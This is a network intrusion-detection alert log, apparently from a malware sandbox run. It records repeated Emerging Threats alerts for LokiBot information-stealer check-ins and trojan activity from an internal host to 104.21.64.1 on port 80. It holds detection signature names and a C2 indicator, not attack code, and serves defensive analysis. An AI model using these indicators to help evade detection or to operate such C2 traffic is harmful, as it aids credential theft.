2025-03-05T15:19:14.160231+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65130	104.21.64.1	80	TCP
2025-03-05T15:19:15.368532+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65131	104.21.64.1	80	TCP
2025-03-05T15:19:16.279063+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65133	104.21.64.1	80	TCP
2025-03-05T15:19:17.197945+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65134	104.21.64.1	80	TCP
2025-03-05T15:19:18.276958+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65135	104.21.64.1	80	TCP
2025-03-05T15:19:19.202726+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65136	104.21.64.1	80	TCP
2025-03-05T15:19:20.116320+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65137	104.21.64.1	80	TCP
2025-03-05T15:19:21.250327+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65138	104.21.64.1	80	TCP
2025-03-05T15:19:22.138775+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65139	104.21.64.1	80	TCP
2025-03-05T15:19:23.095757+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65140	104.21.64.1	80	TCP
2025-03-05T15:19:23.989733+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65141	104.21.64.1	80	TCP
2025-03-05T15:19:24.875713+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65142	104.21.64.1	80	TCP
2025-03-05T15:19:25.705571+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65143	104.21.64.1	80	TCP
2025-03-05T15:19:26.584565+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65144	104.21.64.1	80	TCP
2025-03-05T15:19:27.462057+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65146	104.21.64.1	80	TCP
2025-03-05T15:19:28.257570+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65147	104.21.64.1	80	TCP
2025-03-05T15:19:29.195892+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65148	104.21.64.1	80	TCP
2025-03-05T15:19:30.124205+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65149	104.21.64.1	80	TCP
2025-03-05T15:19:31.006967+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65150	104.21.64.1	80	TCP
2025-03-05T15:19:32.169047+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65151	104.21.64.1	80	TCP
2025-03-05T15:19:33.102834+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65152	104.21.64.1	80	TCP
2025-03-05T15:19:34.047005+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65153	104.21.64.1	80	TCP
2025-03-05T15:19:35.026750+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65154	104.21.64.1	80	TCP
2025-03-05T15:19:35.962529+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65155	104.21.64.1	80	TCP
2025-03-05T15:19:36.863885+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65156	104.21.64.1	80	TCP
2025-03-05T15:19:38.135421+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65157	104.21.64.1	80	TCP
2025-03-05T15:19:39.073048+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65158	104.21.64.1	80	TCP
2025-03-05T15:19:39.992413+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65159	104.21.64.1	80	TCP
2025-03-05T15:19:41.425752+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65160	104.21.64.1	80	TCP
2025-03-05T15:19:42.389060+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65161	104.21.64.1	80	TCP
2025-03-05T15:19:43.183681+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65162	104.21.64.1	80	TCP
2025-03-05T15:19:44.386416+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65163	104.21.64.1	80	TCP
2025-03-05T15:19:45.353491+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65164	104.21.64.1	80	TCP
2025-03-05T15:19:46.340342+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65165	104.21.64.1	80	TCP
2025-03-05T15:19:47.294793+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65166	104.21.64.1	80	TCP
2025-03-05T15:19:48.243461+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65167	104.21.64.1	80	TCP
2025-03-05T15:19:49.154764+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65168	104.21.64.1	80	TCP
2025-03-05T15:19:50.060267+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65169	104.21.64.1	80	TCP
2025-03-05T15:19:51.216566+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65170	104.21.64.1	80	TCP
2025-03-05T15:19:52.152767+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65172	104.21.64.1	80	TCP
2025-03-05T15:19:53.105466+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65173	104.21.64.1	80	TCP
2025-03-05T15:19:54.471150+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65174	104.21.64.1	80	TCP
2025-03-05T15:19:55.406296+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65175	104.21.64.1	80	TCP
2025-03-05T15:19:56.347184+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65176	104.21.64.1	80	TCP
2025-03-05T15:19:57.424926+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65177	104.21.64.1	80	TCP
2025-03-05T15:19:58.251673+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65178	104.21.64.1	80	TCP
2025-03-05T15:19:59.247783+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65179	104.21.64.1	80	TCP
2025-03-05T15:20:00.146884+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65180	104.21.64.1	80	TCP
2025-03-05T15:20:01.128006+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65181	104.21.64.1	80	TCP
2025-03-05T15:20:02.053165+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65182	104.21.64.1	80	TCP
2025-03-05T15:20:03.510396+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65183	104.21.64.1	80	TCP
2025-03-05T15:20:04.309993+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65184	104.21.64.1	80	TCP
2025-03-05T15:20:05.237152+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65185	104.21.64.1	80	TCP
2025-03-05T15:20:06.169211+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65186	104.21.64.1	80	TCP
2025-03-05T15:20:07.110630+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65187	104.21.64.1	80	TCP
2025-03-05T15:20:08.024772+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65188	104.21.64.1	80	TCP
2025-03-05T15:20:08.826439+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65189	104.21.64.1	80	TCP
2025-03-05T15:20:09.712800+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65190	104.21.64.1	80	TCP
2025-03-05T15:20:10.681569+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65191	104.21.64.1	80	TCP
2025-03-05T15:20:11.596097+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65192	104.21.64.1	80	TCP
2025-03-05T15:20:12.621094+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65193	104.21.64.1	80	TCP
2025-03-05T15:20:13.439097+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65194	104.21.64.1	80	TCP
2025-03-05T15:20:14.230324+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65195	104.21.64.1	80	TCP
2025-03-05T15:20:15.023409+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65196	104.21.64.1	80	TCP
2025-03-05T15:20:15.935758+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65197	104.21.64.1	80	TCP
2025-03-05T15:20:16.714135+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65198	104.21.64.1	80	TCP
2025-03-05T15:20:17.814099+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65199	104.21.64.1	80	TCP
2025-03-05T15:20:18.862264+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65200	104.21.64.1	80	TCP
2025-03-05T15:20:19.651383+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65201	104.21.64.1	80	TCP
2025-03-05T15:20:20.465849+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65202	104.21.64.1	80	TCP
2025-03-05T15:20:21.398976+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65203	104.21.64.1	80	TCP
2025-03-05T15:20:22.198041+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65204	104.21.64.1	80	TCP
2025-03-05T15:20:23.144519+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65206	104.21.64.1	80	TCP
2025-03-05T15:20:24.088760+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65207	104.21.64.1	80	TCP
2025-03-05T15:20:25.002799+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65208	104.21.64.1	80	TCP
2025-03-05T15:20:25.892176+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65209	104.21.64.1	80	TCP
2025-03-05T15:20:26.809669+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65210	104.21.64.1	80	TCP
2025-03-05T15:20:27.617094+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65211	104.21.64.1	80	TCP
2025-03-05T15:20:28.642456+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	65212	104.21.64.1	80	TCP

ET MALWARE LokiBot User-Agent (Charon/Inferno)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-05T15:18:26.264189+0100	2021641	1	A Network Trojan was detected	192.168.2.6	64822	104.21.64.1	80	TCP
2025-03-05T15:18:27.314732+0100	2021641	1	A Network Trojan was detected	192.168.2.6	64823	104.21.64.1	80	TCP
2025-03-05T15:18:40.118443+0100	2021641	1	A Network Trojan was detected	192.168.2.6	64910	104.21.64.1	80	TCP
2025-03-05T15:18:41.063990+0100	2021641	1	A Network Trojan was detected	192.168.2.6	64916	104.21.64.1	80	TCP
2025-03-05T15:18:42.436163+0100	2021641	1	A Network Trojan was detected	192.168.2.6	64922	104.21.64.1	80	TCP
2025-03-05T15:18:43.388337+0100	2021641	1	A Network Trojan was detected	192.168.2.6	64933	104.21.64.1	80	TCP
2025-03-05T15:18:44.340489+0100	2021641	1	A Network Trojan was detected	192.168.2.6	64939	104.21.64.1	80	TCP
2025-03-05T15:18:45.260044+0100	2021641	1	A Network Trojan was detected	192.168.2.6	64944	104.21.64.1	80	TCP
2025-03-05T15:18:46.206902+0100	2021641	1	A Network Trojan was detected	192.168.2.6	64951	104.21.64.1	80	TCP
2025-03-05T15:18:47.104029+0100	2021641	1	A Network Trojan was detected	192.168.2.6	64957	104.21.64.1	80	TCP
2025-03-05T15:18:48.215202+0100	2021641	1	A Network Trojan was detected	192.168.2.6	64967	104.21.64.1	80	TCP
2025-03-05T15:18:49.432056+0100	2021641	1	A Network Trojan was detected	192.168.2.6	64973	104.21.64.1	80	TCP
2025-03-05T15:18:50.380983+0100	2021641	1	A Network Trojan was detected	192.168.2.6	64979	104.21.64.1	80	TCP
2025-03-05T15:18:51.243244+0100	2021641	1	A Network Trojan was detected	192.168.2.6	64984	104.21.64.1	80	TCP
2025-03-05T15:18:52.386057+0100	2021641	1	A Network Trojan was detected	192.168.2.6	64989	104.21.64.1	80	TCP
2025-03-05T15:18:53.312515+0100	2021641	1	A Network Trojan was detected	192.168.2.6	64998	104.21.64.1	80	TCP
2025-03-05T15:18:54.248332+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65004	104.21.64.1	80	TCP
2025-03-05T15:18:55.193547+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65011	104.21.64.1	80	TCP
2025-03-05T15:18:56.087380+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65017	104.21.64.1	80	TCP
2025-03-05T15:18:56.978426+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65023	104.21.64.1	80	TCP
2025-03-05T15:18:57.913982+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65031	104.21.64.1	80	TCP
2025-03-05T15:18:58.804767+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65039	104.21.64.1	80	TCP
2025-03-05T15:18:59.697261+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65045	104.21.64.1	80	TCP
2025-03-05T15:19:00.623482+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65051	104.21.64.1	80	TCP
2025-03-05T15:19:01.572925+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65057	104.21.64.1	80	TCP
2025-03-05T15:19:02.499088+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65064	104.21.64.1	80	TCP
2025-03-05T15:19:03.433580+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65070	104.21.64.1	80	TCP
2025-03-05T15:19:04.699265+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65075	104.21.64.1	80	TCP
2025-03-05T15:19:05.646597+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65081	104.21.64.1	80	TCP
2025-03-05T15:19:06.599729+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65089	104.21.64.1	80	TCP
2025-03-05T15:19:07.513346+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65095	104.21.64.1	80	TCP
2025-03-05T15:19:08.433697+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65101	104.21.64.1	80	TCP
2025-03-05T15:19:09.387814+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65110	104.21.64.1	80	TCP
2025-03-05T15:19:10.328042+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65116	104.21.64.1	80	TCP
2025-03-05T15:19:11.380150+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65124	104.21.64.1	80	TCP
2025-03-05T15:19:12.326498+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65129	104.21.64.1	80	TCP
2025-03-05T15:19:13.326854+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65130	104.21.64.1	80	TCP
2025-03-05T15:19:14.574778+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65131	104.21.64.1	80	TCP
2025-03-05T15:19:15.531767+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65133	104.21.64.1	80	TCP
2025-03-05T15:19:16.449051+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65134	104.21.64.1	80	TCP
2025-03-05T15:19:17.546931+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65135	104.21.64.1	80	TCP
2025-03-05T15:19:18.432234+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65136	104.21.64.1	80	TCP
2025-03-05T15:19:19.357013+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65137	104.21.64.1	80	TCP
2025-03-05T15:19:20.494450+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65138	104.21.64.1	80	TCP
2025-03-05T15:19:21.406340+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65139	104.21.64.1	80	TCP
2025-03-05T15:19:22.296931+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65140	104.21.64.1	80	TCP
2025-03-05T15:19:23.243325+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65141	104.21.64.1	80	TCP
2025-03-05T15:19:24.153722+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65142	104.21.64.1	80	TCP
2025-03-05T15:19:25.033572+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65143	104.21.64.1	80	TCP
2025-03-05T15:19:25.854341+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65144	104.21.64.1	80	TCP
2025-03-05T15:19:26.739485+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65146	104.21.64.1	80	TCP
2025-03-05T15:19:27.620806+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65147	104.21.64.1	80	TCP
2025-03-05T15:19:28.413430+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65148	104.21.64.1	80	TCP
2025-03-05T15:19:29.357401+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65149	104.21.64.1	80	TCP
2025-03-05T15:19:30.273452+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65150	104.21.64.1	80	TCP
2025-03-05T15:19:31.415543+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65151	104.21.64.1	80	TCP
2025-03-05T15:19:32.328120+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65152	104.21.64.1	80	TCP
2025-03-05T15:19:33.258249+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65153	104.21.64.1	80	TCP
2025-03-05T15:19:34.315136+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65154	104.21.64.1	80	TCP
2025-03-05T15:19:35.182237+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65155	104.21.64.1	80	TCP
2025-03-05T15:19:36.128276+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65156	104.21.64.1	80	TCP
2025-03-05T15:19:37.362091+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65157	104.21.64.1	80	TCP
2025-03-05T15:19:38.289552+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65158	104.21.64.1	80	TCP
2025-03-05T15:19:39.229840+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65159	104.21.64.1	80	TCP
2025-03-05T15:19:40.649571+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65160	104.21.64.1	80	TCP
2025-03-05T15:19:41.600103+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65161	104.21.64.1	80	TCP
2025-03-05T15:19:42.543512+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65162	104.21.64.1	80	TCP
2025-03-05T15:19:43.625562+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65163	104.21.64.1	80	TCP
2025-03-05T15:19:44.544643+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65164	104.21.64.1	80	TCP
2025-03-05T15:19:45.515011+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65165	104.21.64.1	80	TCP
2025-03-05T15:19:46.494953+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65166	104.21.64.1	80	TCP
2025-03-05T15:19:47.447654+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65167	104.21.64.1	80	TCP
2025-03-05T15:19:48.405134+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65168	104.21.64.1	80	TCP
2025-03-05T15:19:49.305755+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65169	104.21.64.1	80	TCP
2025-03-05T15:19:50.455441+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65170	104.21.64.1	80	TCP
2025-03-05T15:19:51.376040+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65172	104.21.64.1	80	TCP
2025-03-05T15:19:52.320862+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65173	104.21.64.1	80	TCP
2025-03-05T15:19:53.657550+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65174	104.21.64.1	80	TCP
2025-03-05T15:19:54.626334+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65175	104.21.64.1	80	TCP
2025-03-05T15:19:55.576929+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65176	104.21.64.1	80	TCP
2025-03-05T15:19:56.606770+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65177	104.21.64.1	80	TCP
2025-03-05T15:19:57.593257+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65178	104.21.64.1	80	TCP
2025-03-05T15:19:58.413260+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65179	104.21.64.1	80	TCP
2025-03-05T15:19:59.411470+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65180	104.21.64.1	80	TCP
2025-03-05T15:20:00.358832+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65181	104.21.64.1	80	TCP
2025-03-05T15:20:01.276615+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65182	104.21.64.1	80	TCP
2025-03-05T15:20:02.872645+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65183	104.21.64.1	80	TCP
2025-03-05T15:20:03.679442+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65184	104.21.64.1	80	TCP
2025-03-05T15:20:04.465396+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65185	104.21.64.1	80	TCP
2025-03-05T15:20:05.388496+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65186	104.21.64.1	80	TCP
2025-03-05T15:20:06.323161+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65187	104.21.64.1	80	TCP
2025-03-05T15:20:07.260302+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65188	104.21.64.1	80	TCP
2025-03-05T15:20:08.182929+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65189	104.21.64.1	80	TCP
2025-03-05T15:20:08.981372+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65190	104.21.64.1	80	TCP
2025-03-05T15:20:09.868718+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65191	104.21.64.1	80	TCP
2025-03-05T15:20:10.856301+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65192	104.21.64.1	80	TCP
2025-03-05T15:20:11.747713+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65193	104.21.64.1	80	TCP
2025-03-05T15:20:12.780744+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65194	104.21.64.1	80	TCP
2025-03-05T15:20:13.589961+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65195	104.21.64.1	80	TCP
2025-03-05T15:20:14.386360+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65196	104.21.64.1	80	TCP
2025-03-05T15:20:15.186189+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65197	104.21.64.1	80	TCP
2025-03-05T15:20:16.090928+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65198	104.21.64.1	80	TCP
2025-03-05T15:20:17.018044+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65199	104.21.64.1	80	TCP
2025-03-05T15:20:17.962682+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65200	104.21.64.1	80	TCP
2025-03-05T15:20:19.009901+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65201	104.21.64.1	80	TCP
2025-03-05T15:20:19.808283+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65202	104.21.64.1	80	TCP
2025-03-05T15:20:20.620992+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65203	104.21.64.1	80	TCP
2025-03-05T15:20:21.557064+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65204	104.21.64.1	80	TCP
2025-03-05T15:20:22.355800+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65206	104.21.64.1	80	TCP
2025-03-05T15:20:23.305471+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65207	104.21.64.1	80	TCP
2025-03-05T15:20:24.247512+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65208	104.21.64.1	80	TCP
2025-03-05T15:20:25.161067+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65209	104.21.64.1	80	TCP
2025-03-05T15:20:26.048586+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65210	104.21.64.1	80	TCP
2025-03-05T15:20:26.977865+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65211	104.21.64.1	80	TCP
2025-03-05T15:20:27.854049+0100	2021641	1	A Network Trojan was detected	192.168.2.6	65212	104.21.64.1	80	TCP

ETPRO MALWARE LokiBot Checkin M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-05T15:18:26.264189+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	64822	104.21.64.1	80	TCP
2025-03-05T15:18:27.314732+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	64823	104.21.64.1	80	TCP
2025-03-05T15:18:40.118443+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	64910	104.21.64.1	80	TCP
2025-03-05T15:18:41.063990+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	64916	104.21.64.1	80	TCP
2025-03-05T15:18:42.436163+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	64922	104.21.64.1	80	TCP
2025-03-05T15:18:43.388337+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	64933	104.21.64.1	80	TCP
2025-03-05T15:18:44.340489+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	64939	104.21.64.1	80	TCP
2025-03-05T15:18:45.260044+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	64944	104.21.64.1	80	TCP
2025-03-05T15:18:46.206902+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	64951	104.21.64.1	80	TCP
2025-03-05T15:18:47.104029+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	64957	104.21.64.1	80	TCP
2025-03-05T15:18:48.215202+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	64967	104.21.64.1	80	TCP
2025-03-05T15:18:49.432056+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	64973	104.21.64.1	80	TCP
2025-03-05T15:18:50.380983+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	64979	104.21.64.1	80	TCP
2025-03-05T15:18:51.243244+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	64984	104.21.64.1	80	TCP
2025-03-05T15:18:52.386057+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	64989	104.21.64.1	80	TCP
2025-03-05T15:18:53.312515+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	64998	104.21.64.1	80	TCP
2025-03-05T15:18:54.248332+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65004	104.21.64.1	80	TCP
2025-03-05T15:18:55.193547+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65011	104.21.64.1	80	TCP
2025-03-05T15:18:56.087380+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65017	104.21.64.1	80	TCP
2025-03-05T15:18:56.978426+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65023	104.21.64.1	80	TCP
2025-03-05T15:18:57.913982+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65031	104.21.64.1	80	TCP
2025-03-05T15:18:58.804767+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65039	104.21.64.1	80	TCP
2025-03-05T15:18:59.697261+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65045	104.21.64.1	80	TCP
2025-03-05T15:19:00.623482+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65051	104.21.64.1	80	TCP
2025-03-05T15:19:01.572925+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65057	104.21.64.1	80	TCP
2025-03-05T15:19:02.499088+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65064	104.21.64.1	80	TCP
2025-03-05T15:19:03.433580+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65070	104.21.64.1	80	TCP
2025-03-05T15:19:04.699265+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65075	104.21.64.1	80	TCP
2025-03-05T15:19:05.646597+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65081	104.21.64.1	80	TCP
2025-03-05T15:19:06.599729+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65089	104.21.64.1	80	TCP
2025-03-05T15:19:07.513346+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65095	104.21.64.1	80	TCP
2025-03-05T15:19:08.433697+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65101	104.21.64.1	80	TCP
2025-03-05T15:19:09.387814+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65110	104.21.64.1	80	TCP
2025-03-05T15:19:10.328042+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65116	104.21.64.1	80	TCP
2025-03-05T15:19:11.380150+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65124	104.21.64.1	80	TCP
2025-03-05T15:19:12.326498+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65129	104.21.64.1	80	TCP
2025-03-05T15:19:13.326854+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65130	104.21.64.1	80	TCP
2025-03-05T15:19:14.574778+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65131	104.21.64.1	80	TCP
2025-03-05T15:19:15.531767+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65133	104.21.64.1	80	TCP
2025-03-05T15:19:16.449051+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65134	104.21.64.1	80	TCP
2025-03-05T15:19:17.546931+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	65135	104.21.64.1	80	TCP
